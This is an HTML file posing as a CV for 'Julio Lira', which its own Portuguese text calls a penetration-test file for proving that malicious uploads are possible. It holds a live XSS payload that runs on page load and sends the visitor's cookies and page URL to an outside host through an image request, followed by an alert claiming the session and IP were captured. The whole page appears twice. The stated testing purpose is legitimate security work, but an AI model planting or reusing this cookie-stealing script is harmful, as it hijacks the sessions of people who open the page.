Jul10l1r4/C.V. - Julio Lira.html

## C.V. - Julio Lira.html
<DOCTYPE html>
<html>
	<head>
		<meta charset="utf-8">
		<meta name="viewport" content="width=device-width, initial-scale=1">
		<title>Julio Lira - CV</title>
		<meta name="description" content="Trabalho na tanto na área defensiva quanto ofensiva, em segurança da informação. Aqui você terá um breve resumo da minha vida profissional">
		<meta name="author" content="julio lira">
		<meta name="copyright" content="cc">
		<meta name="robots" content="index, follow">
		<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:300,300italic,700,700italic">
		<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/8.0.1/normalize.css">
		<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/milligram/1.4.1/milligram.css">
		<script src="//cdn.jsdelivr.net/github-cards/latest/widget.js"></script>
	</head>
	<body class='container'>
		<header class='box'><br/>
			<center><h1 class='center'>Julio Lira - CV</h1></center>
			<i>Esse arquivo na verdade não fala sobre mim, é um arquivo de teste de penetração. Mas não se preocupe, o ambiente está controlado</i>
		</header>

		<session class='column column-70 box'>
		<img class='column column-40 float-left' src='http://pa1.narvii.com/6985/a3600fcbfd4de79633e5d6af6b69392419013696r1-238-250_00.gif' title='Se você conseguiu ver essa imagem significa que parte do ataque foi bem sucedido. Mas...'/>
			<p>
				Nessa parte irei tentar comprovar que é possível subir arquivos maliciosos. Esse por exemplo possui um código malicioso de XSS que pretende roubar sua sessão nesse site.
			</p>
			<div></div>
			<script>
				document.querySelector("div").innerHTML = `<img src="https://site/20d5b0d2-bf7c-411a-b908-ed862983c32b?data=${document.cookie}-${window.location}">`
			</script>

			<blockquote><strong>ESTOU CUIDANDO DA SUA SEGURANÇA</strong>. Esse código embora seja malicioso respeita os princípios de disponibilidade e integridade, mesmo que haja um ataque bem sucedido após o uso dele. Será com posse de informações relacionadas a sessão puramente comprobatória</blockquote>
		</session><br/>
		<center><i>Mas se quiser me conhecer dá uma olhada <a href='https://jul10l1r4.github.io' target=_blank>aqui</a></i></center>
		<hr/>
		<code>Iremos ajeitar isso juntos!</code>
		<noscript>
			<code>Mas já adiantando:
			✅ Não consegui capturar sua sessão (porque não está com o javascript habilitado)
			🚫 Talvez tenha capturado seu endereço IP externo
			🚫 Dependendo do ambiente também é possível fazer um CSRF
			</code>
		</noscript>

		<script>
			var internet
			if(document.cookie){
				var internet = "❌ Consegui capturar seu cookie atual, provavelmente acessarei sua sessão\n"
			}else{
				var internet = "✅ Não capturei seu cookie\n"
			}
			if(!navigator.onLine){
				var internet = internet + "✅ Nem IP"
			}else {
				var internet = internet + "❌ Capturei seu endereço IP externo"
			}
			alert("Relatório:\n"+internet+"\n🚫 Dependendo do ambiente também é possível fazer um CSRF")
		</script>

	</body>
</html>
	<DOCTYPE html>
	<html>
	<head>
	<meta charset="utf-8">
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<title>Julio Lira - CV</title>
	<meta name="description" content="Trabalho na tanto na área defensiva quanto ofensiva, em segurança da informação. Aqui você terá um breve resumo da minha vida profissional">
	<meta name="author" content="julio lira">
	<meta name="copyright" content="cc">
	<meta name="robots" content="index, follow">
	<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:300,300italic,700,700italic">
	<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/8.0.1/normalize.css">
	<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/milligram/1.4.1/milligram.css">
	<script src="//cdn.jsdelivr.net/github-cards/latest/widget.js"></script>
	</head>
	<body class='container'>
	<header class='box'><br/>
	<center><h1 class='center'>Julio Lira - CV</h1></center>
	<i>Esse arquivo na verdade não fala sobre mim, é um arquivo de teste de penetração. Mas não se preocupe, o ambiente está controlado</i>
	</header>

	<session class='column column-70 box'>
	<img class='column column-40 float-left' src='http://pa1.narvii.com/6985/a3600fcbfd4de79633e5d6af6b69392419013696r1-238-250_00.gif' title='Se você conseguiu ver essa imagem significa que parte do ataque foi bem sucedido. Mas...'/>
	<p>
	Nessa parte irei tentar comprovar que é possível subir arquivos maliciosos. Esse por exemplo possui um código malicioso de XSS que pretende roubar sua sessão nesse site.
	</p>
	<div></div>
	<script>
	document.querySelector("div").innerHTML = `<img src="https://site/20d5b0d2-bf7c-411a-b908-ed862983c32b?data=${document.cookie}-${window.location}">`
	</script>

	<blockquote><strong>ESTOU CUIDANDO DA SUA SEGURANÇA</strong>. Esse código embora seja malicioso respeita os princípios de disponibilidade e integridade, mesmo que haja um ataque bem sucedido após o uso dele. Será com posse de informações relacionadas a sessão puramente comprobatória</blockquote>
	</session><br/>
	<center><i>Mas se quiser me conhecer dá uma olhada <a href='https://jul10l1r4.github.io' target=_blank>aqui</a></i></center>
	<hr/>
	<code>Iremos ajeitar isso juntos!</code>
	<noscript>
	<code>Mas já adiantando:
	✅ Não consegui capturar sua sessão (porque não está com o javascript habilitado)
	🚫 Talvez tenha capturado seu endereço IP externo
	🚫 Dependendo do ambiente também é possível fazer um CSRF
	</code>
	</noscript>

	<script>
	var internet
	if(document.cookie){
	var internet = "❌ Consegui capturar seu cookie atual, provavelmente acessarei sua sessão\n"
	}else{
	var internet = "✅ Não capturei seu cookie\n"
	}
	if(!navigator.onLine){
	var internet = internet + "✅ Nem IP"
	}else {
	var internet = internet + "❌ Capturei seu endereço IP externo"
	}
	alert("Relatório:\n"+internet+"\n🚫 Dependendo do ambiente também é possível fazer um CSRF")
	</script>

	</body>
	</html>